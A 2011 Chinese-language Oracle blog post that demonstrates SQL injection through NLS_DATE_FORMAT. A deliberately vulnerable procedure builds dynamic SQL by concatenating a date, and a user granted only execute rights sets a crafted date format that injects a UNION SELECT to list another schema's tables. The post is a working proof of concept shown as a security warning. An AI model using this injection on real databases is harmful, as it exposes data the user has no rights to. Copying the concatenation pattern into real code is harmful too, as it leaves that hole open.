oracle 輕鬆小sql注入

zhangweizhao發表於2011-08-31
今天看tom的有提到一個很有趣的東東,只授權的procedure execute,別人就可以sql注入,以後你可得小心了,下面請看我的試驗


[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE    10.2.0.4.0      Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME                          USER_ID CREATED
------------------------------ ---------- -------------------
ZYY                                  1099 2011-08-30 11:41:03
GZPX_DB                              1070 2011-08-30 11:41:01
GIAF                                 1069 2011-08-30 11:41:01
DEAN_TRAIN                           1068 2011-08-30 11:41:01
...

75 rows selected.

SQL> select * from tab;

TNAME                          TABTYPE  CLUSTERID
------------------------------ ------- ----------
TEST                           TABLE
TESTA                          TABLE
TESTB                          TABLE
TESTBLOB                       TABLE
TESTC                          TABLE
TESTIMG                        TABLE
TESTKDR                        TABLE
TESTXY                         TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )
  2  as
  3  l_rec   all_users%rowtype;
  4  c       sys_refcursor;
  5  l_query long;
  6  begin
  7  l_query := 'select * from all_users where created = ''' ||p_date ||'''';
  8  dbms_output.put_line( l_query );
  9  open c for l_query;
 10  for i in 1 .. 10
 11  loop
 12  fetch c into l_rec;
 13  exit when c%notfound;
 14  dbms_output.put_line( l_rec.username || '.....' );
 15  end loop;
 16  close c;
 17  end;
 18  /

Procedure created.

SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme
Connected.
SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....

PL/SQL procedure successfully completed.

呵,是不是很眼熟,這當然是anbob的表,這些表並沒有授權給icme。同樣也可以從all_column得到列,那樣就可以得到表只的一部份資料了...

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/23368118/viewspace-706301/,如需轉載,請註明出處,否則將追究法律責任。

相關文章